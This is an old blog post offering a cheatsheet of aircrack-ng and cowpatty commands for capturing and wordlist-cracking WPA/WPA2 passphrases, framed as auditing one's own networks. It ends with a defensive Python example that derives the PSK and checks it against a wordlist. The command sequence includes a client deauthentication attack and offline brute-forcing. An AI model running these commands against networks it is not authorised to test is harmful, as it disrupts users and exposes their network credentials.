Tuesday, June 1, 2010

WPA/WPA2 PSK cracking quick reference

There are too many guides and resources out there on doing this stuff, so I won't be giving much explanation or theory on WPA hacking. Remember, this should only be performed on networks that you have permission to audit the security of. This will serve as a quick and dirty cheatsheet of the commands needed to audit the strength or weakness of your wireless networks' pre-shared keys, using aircrack-ng or cowpatty to brute-force the passphrase with a wordlist.

# airmon-ng start wlan0 // put the interface in monitor mode (creates mon0)

# airodump-ng mon0 // scan the air for targets

# airodump-ng --channel 1 --bssid "AP_MAC_addr" -w wpa.cap mon0 // capture only packets from a specific AP's MAC address and channel (airodump-ng adds a numbered suffix, so the file is written as wpa.cap-01.cap)

# aireplay-ng --deauth 5 -a "AP_MAC_addr" -c "Client_MAC_addr" mon0 // perform a deauthentication attack on a client to force reassociation, in the hope of capturing the WPA handshake

Once the handshake is captured (airodump-ng shows "WPA handshake" in its top line):

using cowpatty:
# cowpatty -f passwords.lst -r wpa.cap -s "essid_of_network" // attempt to brute-force the passphrase using the wordlist

using aircrack-ng:
# aircrack-ng -w passwords.lst -e "essid_of_network" wpa.cap // attempt to brute-force the passphrase using the wordlist
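Both tools take the ESSID because WPA/WPA2-PSK derives the 256-bit key from the passphrase with PBKDF2-HMAC-SHA1 (4096 iterations) salted with the ESSID; each wordlist guess costs that derivation, and precomputed tables only work for one ESSID. The snippet below is an added example (not from this post or from the aircrack-ng/cowpatty projects) that reproduces the derivation and lets you check your own configured PSK against a wordlist before someone else does; the wordlist and the network names are constructed for illustration.

```python
import hashlib
from typing import Iterable, Optional


def derive_psk(essid: str, passphrase: str) -> bytes:
    """WPA/WPA2-PSK master key: PBKDF2-HMAC-SHA1, 4096 rounds, ESSID as salt.

    Matches what `wpa_passphrase` prints and what cowpatty/aircrack-ng
    compute per wordlist entry. Passphrases are 8..63 ASCII characters.
    """
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8..63 ASCII characters")
    return hashlib.pbkdf2_hmac(
        "sha1", passphrase.encode("ascii"), essid.encode("utf-8"), 4096, dklen=32
    )


def psk_hex(essid: str, passphrase: str) -> str:
    return derive_psk(essid, passphrase).hex()


def psk_in_wordlist(essid: str, psk: bytes, wordlist: Iterable[str]) -> Optional[str]:
    """Return the wordlist entry that yields `psk` for `essid`, or None.

    Run this against your own network's PSK (e.g. the psk= value from
    wpa_supplicant.conf) to see whether it falls to a wordlist attack.
    """
    for word in wordlist:
        word = word.rstrip("\r\n")
        if 8 <= len(word) <= 63 and derive_psk(essid, word) == psk:
            return word
    return None


# Constructed wordlist standing in for passwords.lst from the commands above.
SAMPLE_WORDLIST = ["password", "letmein1", "qwerty123", "correct horse battery staple"]


def audit(essid: str, passphrase: str) -> Optional[str]:
    """Derive the PSK for a network and check it against the sample wordlist."""
    return psk_in_wordlist(essid, derive_psk(essid, passphrase), SAMPLE_WORDLIST)


if __name__ == "__main__":
    # IEEE 802.11i test vector: ESSID "IEEE", passphrase "password".
    print(psk_hex("IEEE", "password"))
    print(audit("IEEE", "password"))          # found in the wordlist
    print(audit("IEEE", "Vf7#q2Lp!xR9wTz0"))  # not derivable from it
```

The same passphrase yields a different PSK under a different ESSID, which is why a non-default network name defeats precomputed tables but not a live wordlist run; only passphrase length and randomness do that.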
